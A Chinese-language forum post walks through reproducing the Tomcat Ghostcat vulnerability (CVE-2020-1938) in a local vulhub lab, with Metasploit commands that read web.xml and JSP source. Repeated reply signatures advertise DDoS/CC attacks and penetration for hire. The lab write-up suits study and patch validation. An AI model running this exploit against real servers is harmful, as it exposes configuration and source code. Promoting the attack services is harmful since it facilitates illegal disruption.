登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
安全
›
【vulhub】tomcat CVE-2020-1938(AJP漏洞)
【vulhub】tomcat CVE-2020-1938(AJP漏洞)
[ 复制链接 ]
闻人莹华
2025-6-1 21:00:01
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
渗透环境
攻击机: 192.168.66.130(Kali)
漏洞收录于:vulhub/tomcat/CVE-2020-1938
漏洞详情
也被称为“Ghostcat”漏洞,是一个影响Apache Tomcat服务器的严重安全漏洞。
漏洞原理
Tomcat默认在server.xml中开启
AJP
协议端口(默认8009),用于与其他Web服务器(如Apache HTTPD)通信。由于AJP协议在处理请求时未对用户输入充分验证,攻击者可通过构造恶意请求操控以下三个关键属性:
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
通过控制这些属性,攻击者可读取或包含webapp目录下的任意文件(如WEB-INF/web.xml、源代码等),甚至结合文件上传功能实现远程代码执行(RCE)
受影响版本
Apache Tomcat 6(全版本)
Apache Tomcat 7(7.0.0至7.0.99)
Apache Tomcat 8(8.0.0至8.5.50)
Apache Tomcat 9(9.0.0至9.0.30)
漏洞触发条件
开启AJP协议端口
:默认情况下,Tomcat的AJP连接器(8009端口)监听所有IP地址(0.0.0.0)。
受影响版本
:使用存在漏洞的Tomcat版本且未升级修复。
复现漏洞
启动环境
vulhub启动漏洞环境
docker-compose up -d
复制代码
可以看到,该容器确实在监听所有IP地址的8009端口
漏洞利用
可以使用msf来验证漏洞,msf中默认的filename值为/WEB-INF/web.xml,在靶机中对应的路径实际上是/usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml,也就是说,利用该漏洞只能读取到/usr/local/tomcat/webapps/ROOT/下的文件。
msfconsole
search cve-2020-1938
use 0
show options
set rhosts 127.0.0.1 # 漏洞环境是部署在本地的docker容器中的
run
复制代码
红框中的内容就是WEB-INF/web.xml,能够成功读到,说明漏洞存在。
也可以选择其他文件,如index.jsp,其完整路径为/usr/local/tomcat/webapps/ROOT/index.jsp
set filename /index.jsp
run
复制代码
也能够读到jsp文件源码
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
vulhub
tomcat
CVE
2020
1938
相关帖子
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
Sevlet与Tomcat
漏洞通报 — CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
Struts2 S2-066(CVE-2023-50164)漏洞复现
Tomcat中启用h3的方法是什么
深入解析Tomcat类加载器:为何及如何打破Java双亲委派模型
PWN手的成长之路-03-bjdctf_2020_babystack
CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
Tomcat部署zrlog——处理动态数据的环境
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
2
535
左优扬
2025-07-29
安全
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
4
345
呈步
2025-07-29
业界
Sevlet与Tomcat
3
560
绂染
2025-08-22
安全
漏洞通报 — CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
3
173
咒卖箴
2025-09-12
安全
Struts2 S2-066(CVE-2023-50164)漏洞复现
1
206
蓝娅萍
2025-09-26
安全
Tomcat中启用h3的方法是什么
2
149
娥搽裙
2025-09-28
业界
深入解析Tomcat类加载器:为何及如何打破Java双亲委派模型
6
952
呵烘稿
2025-10-01
安全
PWN手的成长之路-03-bjdctf_2020_babystack
2
781
申倩语
2025-10-06
安全
CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
2
275
陶田田
2025-11-01
安全
Tomcat部署zrlog——处理动态数据的环境
0
220
予捻
2025-12-15
回复
(8)
羔迪
2025-10-15 00:52:47
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
前排留名,哈哈哈
少屠
2025-10-19 00:41:32
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
不错,里面软件多更新就更好了
苗嘉惠
2025-10-29 05:42:35
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
这个有用。
谅潭好
2025-11-3 22:55:11
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
东西不错很实用谢谢分享
南宫玉英
2025-12-1 02:43:45
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
感谢发布原创作品,程序园因你更精彩
盒礁泅
2025-12-2 03:18:16
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢,下载保存了
葛雅隽
5 天前
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
新版吗?好像是停更了吧。
方子楠
昨天 01:25
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
很好很强大 我过来先占个楼 待编辑
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
闻人莹华
昨天 01:25
关注
0
粉丝关注
20
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991124
anyue1937
9994893
kk14977
6845357
4
xiangqian
638210
5
韶又彤
9997
6
宋子
9983
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9951
查看更多
今日好文热榜
736
Prompt 工程
497
Prompt 工程
757
Gemini 3.0 Pro 迁移避坑指南:OpenAI API
20
是猫踩键盘还是乱码?不,这是你刚写的正则
248
RSA加密
317
pydash原型链污染
177
大模型榜单周报(2025/12/08—2025/12/12)
849
当你不再迷信“最强模型”,系统设计才刚刚
876
软件i2c
301
2025年专业起名老师联系方式汇总:全国资深
654
解码IP协议号:网络世界的“货物运单”
712
Python Selenium 漫步指南:从入门到精通
646
AI 付费模式终极对比:ChatGPT、Gemini、Cl
840
JSAPIThree 加载 3D Tiles 学习笔记:大规
360
LLM 工具调用的范式演进与认知模型集成
358
Requirements Engineering with AI for Con
344
【节点】[Adjustment-WhiteBalance节点]原
305
上海专业建筑维修服务解析:标准化流程如何
950
【分析式AI】-带你弄懂XGBoost模型
733
【分析式AI】-带你弄懂XGBoost模型